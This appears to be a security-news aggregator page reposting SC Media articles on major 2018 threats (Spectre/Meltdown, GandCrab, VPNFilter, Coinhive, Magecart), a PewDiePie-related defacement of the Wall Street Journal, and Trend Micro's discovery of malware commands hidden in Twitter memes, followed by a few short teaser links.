It was clear it was going to be an intense year the cybersecurity industry when, just days after ringing in 2018, researchers announced a vulnerability found in essentially all CPU processors made over the previous two decades. From there, things only got busier, with news of Russian exploits, new ransomware families and much, much more.

Spectre and Meltdown: A mere three days into 2018, multiple groups of researchers publicly disclosed Spectre and Meltdown, a trio of CPU chip vulnerabilities representing an entirely new classification of bugs. Found in Intel, IBM, ARM and AMD chips powering an enormous spectrum of hardware products, these vulnerabilities were found to result from a flaw in the processor optimization functionality known as speculative execution. Researchers warned that the bugs could be exploited via side channel attack to access and steal sensitive information from devices by tricking programs into either leaking their secrets or accessing another application’s memory. Spectre and Meltdown’s public disclosure came after months of secretive, painstaking and unprecedented cross-industry collaboration to create patches and modifications, resulting in complex changes to many layers of the software stack. In some cases, these repairs regrettably slowed down the performance of affected processors. In the ensuing months, scientists found additional, new-generation variants of Spectre and Meltdown, as well as another family of speculative execution bugs called Foreshadow and Foreshadow-NG. In response to ongoing concerns, Intel said that its next-generation of chips would be designed with built-in defenses for Spectre-like attacks.

GandCrab: Debuting last January, the malicious cryptor GandCrab quickly became the breakthrough ransomware of 2018. In a departure from conventional ransomware tactics, GandCrab’s developers have chiefly relied on exploit kits such as RIG, GrandSoft and Fallout to distribute their malware. Typically, these kits are served up in malvertising campaigns. Adding to its quirkiness, GandCrab also demands payment using the cryptocurrency Dash, and its C2 servers are generally hosted on the Namecoin TLD domain .bit. GandCrab has so far evolved into five major versions; decryptors are available for several of them, including the original and versions four and five. Last October, Bitdefender estimated that GandCrab’s developers may have made at least $300 million in the prior couple of months, noting that the customized ransom demands ranged anywhere from $600 to $700,000. All things considered, it’s no wonder that GandCrab has left its victims feeling pretty crabby.

Dishonorable mention: SamSam ransomware, which ratcheted up its targeting of healthcare and government institutions this past year, including the city of Atlanta. An August report from Sophos estimated that SamSam has so far earned its creator roughly $6 million.

VPNFilter: A potentially destructive attack may have been averted after the stunning discovery of hundreds of thousands of global networking devices infected with VPNFilter, a modular malware program attributed to Russia’s Fancy Bear APT group. Secretly residing on a wide array of routers and Network Attached Storage devices since 2016, VPNFilter is capable of DDoS attacks, device bricking, data exfiltration and cyber espionage. Additional third-stage modules also help it more easily propagate from network devices to other endpoints, perform data filtering, and obfuscate or encrypt its malicious traffic. The first stage of VPNFilter, which establishes persistence, is unique among IoT malwares in that it can survive a reboot. Infection levels were especially heavy in Ukraine, leading officials to suspect Russia could have been preparing to execute a large-scale attack against its neighbor. In May, the FBI announced that it seized the domain linked to the VPNFilter botnet, recommending that network device owners reboot their devices to kill off any second- or third-stage malware. In July, the Ukraine announced that a Russian attempt to attack a chlorine distillation plant using VPNFilter was thwarted.

Coinhive: The value of Bitcoin and other popular digital currencies may be dropping of late, but the popularity of cryptominers among the cybercriminal community has steadily soared. King of the 2018 cryptojackers was Coinhive, thanks in part to its focus on Monero, an anonymous currency whose transactions are highly difficult to trace. Coinhive is offered as a legitimate service for website owners seeking a money-making alternative to advertisements, but that doesn’t stop malicious actors from secretly injecting its code into compromised sites in order to siphon processing power from their visitors. For example, a report published last May by security researcher Troy Mursch revealed one Coinhive campaign that compromised 391 Drupal sites, including those operated by the San Diego Zoo, Lenovo, UCLA, the National Labor Relations Board, the government of Chihuahua, Mexico and more.

Magecart: The e-commerce card-skimming malware threat collectively known as Magecart isn’t actually attributed to one single actor. There are at least six major groups plus additional smaller perpetrators that all use versions of the same toolset. In a typical case, the attacker secretly embeds compromised webpages with a JavaScript-based tool that copies data entered into online forms and sends it to a malicious drop server. While this threat dates as far back as 2014, two of the most recent groups to emerge vaulted Magecart to new heights of infamy in 2018, after conducting highly prominent and lucrative campaigns against major online players. A November 2018 research report from Flashpoint and RiskIQ refers to most high-profile Magecart group as “Group 6,” noting this was the actor appears to exclusively focus on top-tier targets – successfully breaching both British Airways and Newegg earlier this year. Meanwhile, a separate Magecart group has taken a different approach, compromising potentially thousands of companies at once by initially infecting their third-party service providers in a supply chain attack. It is this group that successfully breached Ticketmaster this year as part of a campaign targeting more than 800 e-commerce sites, RiskIQ reported.

The post 2018 – The year that was: Top Threats appeared first on SC Media.


Go to Source
Author: Bradley Barth

The Wall Street Journal was hacked and had a page defaced by the apparent fans of the online personality PewDiePie.

The defaced page contained sponsored content, but was altered to show an apology by the Journal to Felix Kjellberg who runs the PewDiePie YouTube channel. The page was taken down, but a copy has been stored on The Internet Archive.

The exact reason for the hack is not known, but The Verge noted the PewDiePie’s fans have had a running feud with the business newspaper since it ran an investigatory story into his YouTube channel. The Journal told The Verge it was aware of the attack and is investigating.

This is not the first time hackers have come out in support for Kjellberg. In late November a hacker has forced thousands of internet-connected printers to spit out messages in support of Swedish video game commentator and YouTube star PewDiePie. The prankster said he (or she) is doing it to raise cybersecurity awareness, according to a BBC report, and claims he could even cause physical damage to the printers by repeatedly writing data to their chips until they fry.

The post WSJ gets a slice of PewDiePie appeared first on SC Media.


Go to Source
Author: Doug Olenick

Researchers from Trend Micro have reported the discovery of two Twitter posts containing malicious memes that feature hidden code that acts like a command-and-control service for downloaded malware.

In a blog post published late last week, the researchers said the tweets were posted on Oct. 25 and 26, respectively, using a Twitter account created back in 2017. Abusing the meme this way is essentially a unique form of steganography, a technique used by malware developers to conceal malicious code inside images in order for it to go undetected.

In this case, the memes hid a “/print” command, which tells the malware to take screenshots of the infected machine and then exfiltrate images to an attacker-controlled server whose address is available via a hard-coded URL on Pastebin.com.

Trend Micro identities the corresponding malware as TROJAN.MSIL.BERBOMTHUM.AA. Researcher and blog post author Aliakbar Zahravi said the threat is “notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.”

This malware supports other commands besides “/print,” including commands for capturing clipboard content, and collecting host machine information, including usernames, running processes and file names. It is not clear, however, what the method or vector is through which the malware infects its victims.

Twitter removed the offending account on Dec. 13, Trend Micro added. A screenshot provided by the cybersecurity company shows that one of the memes featured an image of Laurence Fishburne in The Matrix, with words that read: “WHAT IF I TOLD YOU THE RESOURCES ARE NOT REAL”. The user’s display name in the screenshot was “bomber”.

Twitter’s shares fell seven percent yesterday following the Trend Micro report, as well as a public disclosure from the social media giant that it was investigating unusual online support forum traffic that could have been the work of state-sponsored hackers.

The post That awkward moment when cybercriminals use memes to hide malicious code appeared first on SC Media.


Go to Source
Author: Bradley Barth

In the good old days, incinerating backup tapes or shredding a few hard drives would have solved the problem. Today, we have a bigger challenge.


Go to Source
Author: Kaan Onarlioglu Senior Security Researcher, Akamai

Devastating, targeted ransomware attacks didn’t start with SamSam and they didn’t end with it either.


Go to Source
Author: Mark Stockley

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Original Post from Talos Security Post authored by Nick Biasini. Executive Summary As 2018 draws to…

As Cryptocurrency Crash Continues, Will Mining Threat Follow?

Original Post from Talos Security Post authored by Nick Biasini. Executive Summary As 2018 draws to…

WordPress Appliance - Powered by TurnKey Linux